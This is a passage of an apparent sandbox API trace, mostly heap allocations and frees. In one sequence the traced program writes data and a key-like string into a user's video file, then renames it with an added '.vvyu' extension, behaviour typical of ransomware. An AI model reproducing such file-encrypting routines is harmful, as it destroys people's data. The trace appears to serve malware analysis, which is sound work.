out: hHeap=0x6a0000) returned 1 [0187.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39868 | out: hHeap=0x6a0000) returned 1 [0187.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0187.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0187.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39868 [0187.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0187.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39820 [0187.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0187.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39808 [0187.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0187.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0187.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0187.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0187.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0187.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0187.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0187.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0187.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39820 | out: hHeap=0x6a0000) returned 1 [0187.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39808 | out: hHeap=0x6a0000) returned 1 [0187.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39868 | out: hHeap=0x6a0000) returned 1 [0187.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0187.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0187.976] GetCurrentThreadId () returned 0x264 [0187.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0187.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d380f8 [0187.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0187.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0187.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0187.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0187.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.977] GetCurrentThreadId () returned 0x264 [0187.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0187.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0187.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0187.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0187.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39868 [0187.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0187.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0187.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0187.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39808 [0187.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0187.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0187.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0187.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0187.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39820 [0187.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0187.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0187.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0187.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397f0 [0187.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0187.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39880 [0187.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0187.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39850 [0187.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39838 [0187.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39898 [0187.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39838 | out: hHeap=0x6a0000) returned 1 [0187.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39838 [0187.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39850 | out: hHeap=0x6a0000) returned 1 [0187.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0187.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0187.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0187.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39808 | out: hHeap=0x6a0000) returned 1 [0187.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39808 [0187.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0187.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39868 | out: hHeap=0x6a0000) returned 1 [0187.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0187.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39898 | out: hHeap=0x6a0000) returned 1 [0187.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42d30 [0187.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0187.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0187.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39808 | out: hHeap=0x6a0000) returned 1 [0187.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42f48 [0187.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0187.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0187.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0187.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0187.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0187.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0187.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d30 | out: hHeap=0x6a0000) returned 1 [0187.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42f48 | out: hHeap=0x6a0000) returned 1 [0187.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0187.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39838 | out: hHeap=0x6a0000) returned 1 [0187.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39880 | out: hHeap=0x6a0000) returned 1 [0187.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39820 | out: hHeap=0x6a0000) returned 1 [0187.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397f0 | out: hHeap=0x6a0000) returned 1 [0187.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0187.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0187.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0187.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397d8 | out: hHeap=0x6a0000) returned 1 [0187.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38eb0 | out: hHeap=0x6a0000) returned 1 [0187.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0187.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0187.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0187.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0187.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0187.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0187.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0187.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0187.990] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x41f, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb14*=0x41f, lpOverlapped=0x0) returned 1 [0187.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.991] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x424, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.991] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0187.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0187.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0187.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0187.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.992] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0187.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0187.992] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0187.992] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0187.993] CloseHandle (hObject=0x584) returned 1 [0187.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d42908 [0187.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.994] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\UsiZz5vLNleCVW.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\usizz5vlnlecvw.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\UsiZz5vLNleCVW.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\usizz5vlnlecvw.mp4.vvyu")) returned 1 [0187.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.996] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0187.999] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x237ede80, ftCreationTime.dwHighDateTime=0x1d8a5cf, ftLastAccessTime.dwLowDateTime=0xd7765030, ftLastAccessTime.dwHighDateTime=0x1d8a5f7, ftLastWriteTime.dwLowDateTime=0xd7765030, ftLastWriteTime.dwHighDateTime=0x1d8a5f7, nFileSizeHigh=0x0, nFileSizeLow=0x424, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UsiZz5vLNleCVW.mp4", cAlternateFileName="USIZZ5~1.MP4")) returned 0 [0187.999] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0188.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0188.000] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0188.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d307a8 | out: hHeap=0x6a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30760 | out: hHeap=0x6a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30718 | out: hHeap=0x6a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d306d0 | out: hHeap=0x6a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30a30 | out: hHeap=0x6a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30a78 | out: hHeap=0x6a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30ac0 | out: hHeap=0x6a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30b08 | out: hHeap=0x6a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30b50 | out: hHeap=0x6a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30b98 | out: hHeap=0x6a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30be0 | out: hHeap=0x6a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30c28 | out: hHeap=0x6a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30c70 | out: hHeap=0x6a0000) returned 1 [0188.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30cb8 | out: hHeap=0x6a0000) returned 1 [0188.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30d00 | out: hHeap=0x6a0000) returned 1 [0188.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30d48 | out: hHeap=0x6a0000) returned 1 [0188.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0188.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0188.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3f0 | out: hHeap=0x6a0000) returned 1 [0188.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f438 | out: hHeap=0x6a0000) returned 1 [0188.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2feb8 | out: hHeap=0x6a0000) returned 1 [0188.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b10 [0188.001] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0188.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, 